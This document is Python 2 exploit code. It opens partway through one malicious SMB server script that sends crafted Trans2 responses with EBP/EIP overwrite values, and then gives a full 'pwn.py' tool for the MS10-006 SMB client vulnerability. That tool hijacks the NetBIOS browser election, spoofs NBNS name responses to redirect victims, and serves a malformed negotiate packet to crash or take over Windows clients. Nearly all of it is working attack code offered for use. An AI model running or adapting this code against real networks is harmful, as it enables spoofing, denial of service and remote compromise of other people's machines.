"\x41\x00\x4e\x00\x20\x00\x4d\x00\x61\x00\x6e\x00\x61\x00\x67\x00"
"\x65\x00\x72\x00\x00"
)

packetree = (
"\x00\x00\x00\x38"
"\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe\x00\x08\x30\x00"
"\x07\xff\x00\x38\x00\x01\x00\xff\x01\x00\x00\xff\x01\x00\x00\x07"
"\x00\x49\x50\x43\x00\x00\x00\x00"
)

packetntcreate = (
"\x00\x00\x00\x87"
"\xff\x53\x4d\x42\xa2\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x84\x08\x00\x08\x40\x00"
"\x2a\xff\x00\x87\x00\x00\x00\x40\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00"
"\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x02\x00\xff\x05\x00\xff\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x9b\x01\x12"
"\x00\x9b\x01\x12\x00\x00\x00"
)

packetrans = (
"\x00\x00\x00\x5a"
"\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x30\x0b\x00\x08\x50\x00"
"\x0a\x02\x00\x18\x00\x00\x00\x02\x00\x38\x00\x00\x00\x18\x00\xff"
"\xff\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x50\x51\x52\x53\x54\x55\x56"
"\x02\x61"+EBP+EIP
)

class SMB1(SocketServer.BaseRequestHandler):
    
    def server_bind(self):
       self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
       self.socket.bind(self.server_address)

    def handle(self):
      try:
       while True:
         print "From:", self.client_address
         data = self.request.recv(1024)

         ##Negotiate Protocol Response
         if data[8] == "\x72":       
           self.request.send(packetnego)
           print "Negotiate Response sent\n"

         ##Session Setup AndX Response, NTLMSSP_CHALLENGE, Error: STATUS_MORE_PROCESSING_REQUIRED
         if data[8] == "\x73":    
           self.request.send(packetsession)
           print "Session Response sent\n"
           #Session Setup AndX Response
           data = self.request.recv(1024)      
           if data[8] == "\x73":
              self.request.send(packetsession2)
              print "Session 2 Response sent\n"

         ##Tree Connect AndX Response
         if data[8] == "\x75":     
           self.request.send(packetree)
           print "TREE Response sent\n"

         ##NT Create AndX Response, FID: 0x4000
         if data[8] == "\xa2":       
           self.request.send(packetntcreate)
           print "NT create Response sent\n"

         ####Trans2 Response, QUERY_FS_INFO
         if data[8] == "\x32":    
           self.request.send(packetrans)
           print "Trans2 Response sent box pwned\n"

      except Exception:
         print "oups"
         self.request.close()
         print "Disconnected from", self.client_address

SocketServer.TCPServer.allow_reuse_address = 1
launch = SocketServer.TCPServer(('', 445),SMB1)
launch.serve_forever()

# More Info: http://g-laurent.blogspot.com/2010/04/turning-smb-client-bug-to-server-side.html
import sys,SocketServer,socket,threading,time,random
from random import *
from time import sleep
from socket import *

if len(sys.argv)<=2:
sys.exit('Usage: pwn.py Your_ip Broadcast_ip\n\r Example: pwn.py 10.0.0.1 10.0.0.255')

ip = str(sys.argv[1])
nbns = str(sys.argv[2]),137
browser = str(sys.argv[2]),138


elec = "\x42\x4f\x00"
domainmasterbro = "\x42\x4c\x00"

##BROWSER election request
browserelect = [chr(int(a, 16)) for a in """
11 02 bd 82 c0 a8 00 96 00 8a 00 ae 00 00 20 46
47 45 4e 45 43 45 50 46 49 43 41 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 41 41 00
20 46 48 45 50 46 43 45 4c 45 48 46 43 45 50 46
46 46 41 43 41 43 41 43 41 43 41 43 41 43 41 42
4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 14 00 00 00 00 00 00 00 00 00 e8
03 00 00 00 00 00 00 00 00 14 00 56 00 03 00 01
00 01 00 02 00 25 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 08 09 a8 0f 01 20 1b e9
a5 00 00 00 00 00 56 4d 42 4f 58 00""".split()]

##Local Master Announcement
browsermaster = [chr(int(a, 16)) for a in """
11 02 bd 2c c0 a8 00 96 00 8a 00 bb 00 00 20 45
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00
20 46 48 45 50 46 43 45 4c 45 48 46 43 45 50 46
46 46 41 43 41 43 41 43 41 43 41 43 41 43 41 42
4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 21 00 00 00 00 00 00 00 00 00 e8
03 00 00 00 00 00 00 00 00 21 00 56 00 03 00 01
00 00 00 02 00 32 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0f 00 80 fc 0a 00 4d 41
53 54 45 52 00 00 00 00 00 00 00 00 00 00 00 06
2b 10 84 00 00 0f 01 55 aa 00""".split()]

resetcache = [chr(int(a, 16)) for a in """
11 0a 6b a8 c0 a8 0a 66 00 8a 00 c5 00 00 20 45
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00
20 41 42 41 43 46 50 46 50 45 4e 46 44 45 43 46
43 45 50 46 48 46 44 45 46 46 50 46 50 41 43 41
42 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 2b 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 2b 00 56 00 03 00 01
00 01 00 02 00 3c 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0e 02""".split()]

resetlbm = [chr(int(a, 16)) for a in """
11 0a 6b a8 c0 a8 0a 66 00 8a 00 c5 00 00 20 45
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00
20 41 42 41 43 46 50 46 50 45 4e 46 44 45 43 46
43 45 50 46 48 46 44 45 46 46 50 46 50 41 43 41
42 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 2b 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 2b 00 56 00 03 00 01
00 01 00 02 00 3c 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0e 01""".split()]

##Browser Master annoncement
masterannon = [chr(int(a, 16)) for a in """
11 02 bd 2c c0 a8 00 96 00 8a 00 bb 00 00 20 45
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00
20 46 48 45 50 46 43 45 4c 45 48 46 43 45 50 46
46 46 41 43 41 43 41 43 41 43 41 43 41 43 41 42
4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 21 00 00 00 00 00 00 00 00 00 e8
03 00 00 00 00 00 00 00 00 21 00 56 00 03 00 01
00 00 00 02 00 32 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0d 4d 41 53 54 45 52 00""".split()]

regmsbrowse = [chr(int(a, 16)) for a in """
be 6e 29 10 00 01 00 00 00 00 00 01 20 41 42 41
43 46 50 46 50 45 4e 46 44 45 43 46 43 45 50 46
48 46 44 45 46 46 50 46 50 41 43 41 42 00 00 20
00 01 c0 0c 00 20 00 01 00 04 93 e0 00 06 80 00
c0 a8 00 96""".split()]

##NBNS Spoofing
spoof = [chr(int(a, 16)) for a in """
08 f3 85 80 00 00 00 01 00 00 00 00 20 46 48 45
50 46 43 45 4c 45 48 46 43 45 50 46 46 46 41 43
41 43 41 43 41 43 41 43 41 43 41 42 4e 00 00 20
00 01 00 04 93 e0 00 06 00 00""".split()]

def nametid(data,packet,service):
    pack = packet[:]
    pack[2:4]=data[2:4] ##Transaction ID
    pack[4:8] = inet_aton(str(sys.argv[1])) ##OurIP Addres
    pack[48:82]=data[48:79]+service ##Service/domain name
    return pack

def nametidrand(data,packet,service):
    pack = packet[:]
    pack[2:4]= "\x80"+str(chr(choice(range(256)))) ##Transaction ID
    pack[4:8] = inet_aton(str(sys.argv[1])) ##OurIP Addres
    pack[48:82]=data[48:79]+service ##Service/domain name
    return pack

def addipbrow(packet):
    pack = packet[:]
    pack[4:8] = inet_aton(str(sys.argv[1]))
    return pack

def addipnb(packet):
    pack = packet[:]
    pack[len(packet)-4:] = inet_aton(str(sys.argv[1]))
    return pack

def sockbroad(packet,host):
   s = socket(AF_INET,SOCK_DGRAM)
   s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
   s.sendto(packet,host)

class BROWSER(SocketServer.BaseRequestHandler):
     
    def server_bind(self):
       self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
       self.socket.bind(self.server_address)

    def handle(self):
        ip = inet_aton(str(sys.argv[1]))
        request, socket = self.request
        data = request
        print "From:", self.client_address
        if data[168] == "\x01" or data[168] == "\x0f" or data[168] == "\x08" and self.client_address[0] != sys.argv[1]:

           sockbroad(''.join(addipbrow(resetcache)),browser)
           print "[+]LMB cache Successfully Reseted"

           sockbroad(''.join(addipbrow(resetlbm)),browser)
           print "[+]LMB Successfully killed"

           for x in range(4):
              sockbroad(''.join(nametid(data,browserelect, elec)),browser)
              sleep(0.8)
           print "[+] Election Won !\n"

           for x in range(4):
              sleep(0.5)
              sockbroad(''.join(addipnb(regmsbrowse)),nbns)
           print "[+]Now Register __MSBROWSE__ :] "
                  
           sockbroad(''.join(nametidrand(data,browsermaster, elec)),browser)
           sleep(1)
           sockbroad(''.join(nametidrand(data,masterannon, domainmasterbro)),browser)
           print "[+] Now LBM ! \n"

#NBNS SPOOF;

def namenbnstid(data,packet):
    pack = packet[:]
    pack[0:2]=data[0:2]##Transaction ID
    pack[12:48]=data[12:48]##Netbios name
    return pack

class NBNS(SocketServer.BaseRequestHandler):
     
    def server_bind(self):
       self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
       self.socket.bind(self.server_address)

    def handle(self):
        request, socket = self.request
        data = request
        print "From:", self.client_address
        #Hijack
        if data[2:4] == "\x01\x10":  
           buffer0 = ''.join(namenbnstid(data,spoof))+inet_aton(str(sys.argv[1]))
           socket.sendto(buffer0, self.client_address)
           print "Fake NBNS Response sended\n"

packetnego = (
##SMB Header
"\x00\x00\x00\x7f"                   #Netbios length
"\xff\x53\x4d\x42"                   #Server type
"\x72"                               #Operation/Command
"\x00\x00\x00\x00"                   #Statut command OK Success
"\x98"                               #Flag 0x98
"\x53\xc8"                           #Flag 0xc853
"\x00\x00"                           #PID High
"\x00\x00\x00\x00\x00\x00\x00\x00"   #Signature
"\x00\x00"                           #Reserved
"\x00\x00"                           #Tree ID
"\xff\xfe"                           #Process ID
"\x00\x00"                           #User ID
"\x00\x00"                           #Multiplex ID
##SMB Header end

##Negotiate Protocol
"\x11"                               #Word count
"\x05\x00"                           #Choosen dialect, no-5 from client list
"\x03"                               #Security mode
"\x41\x41"                           #Max MPX count
"\x41\x41"                           #Max VCs
##Issue
"\x03\x00\x00\x00"                   #Max buffer size; The issue is located here, as we specify an only 4 bytes max buffer length is this example.
#Usually a server would provide a 4356 max buffer size.
"\x41\x41\x41\x41"                   #Max raw buffer
"\x00\x00\x00\x00"                   #Session key
"\xfc\xe3\x01\x80"                   #Capabilities
"\xea\xb1\x6e\x18\x11\x62\xca\x01"   #System Time
"\x2c\x01"                           #Server timezone
"\x00"                               #Key length
"\x3a\x00"                           #Byte count
#Server GUID
"\x68\x52\x38\x38\xf2\xe3\x9f\x4f\x94\x26\xbd\xcb\xca\x2e\x28\x9a" 
#Security Blob
"\x60\x28\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x1e\x30\x1c\xa0\x1a"
"\x30\x18\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x1e\x06\x0a"
"\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
##Negotiate Protocol end
)

class MS10_006(SocketServer.BaseRequestHandler):

    def server_bind(self):
       self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
       self.socket.bind(self.server_address)

    def handle(self):
        print "From:", self.client_address
        data = self.request.recv(256)
        if data[0] == "\x81":
           buffer0 = "\x82\x00\x00\x00"       
           self.request.send(buffer0)
           print "Session Positive Response sended\n"
           data = self.request.recv(1024)
        if data[8] == "\x72":   
           self.request.send(packetnego)
           print "Negotiate Response sended kaboom !\n"
           data = self.request.recv(1024)


def serve_thread_udp(host, port, handler):
    server = SocketServer.UDPServer((host, port), handler)
    server.serve_forever()

def serve_thread_tcp(host, port, handler):
    server = SocketServer.TCPServer((host, port), handler)
    server.serve_forever()

SocketServer.TCPServer.allow_reuse_address = 1
threading.Thread(target=serve_thread_tcp,args=('', 139,MS10_006)).start()
threading.Thread(target=serve_thread_tcp,args=('', 445,MS10_006)).start()
threading.Thread(target=serve_thread_udp,args=('', 137,NBNS)).start()
threading.Thread(target=serve_thread_udp,args=('', 138,BROWSER)).start()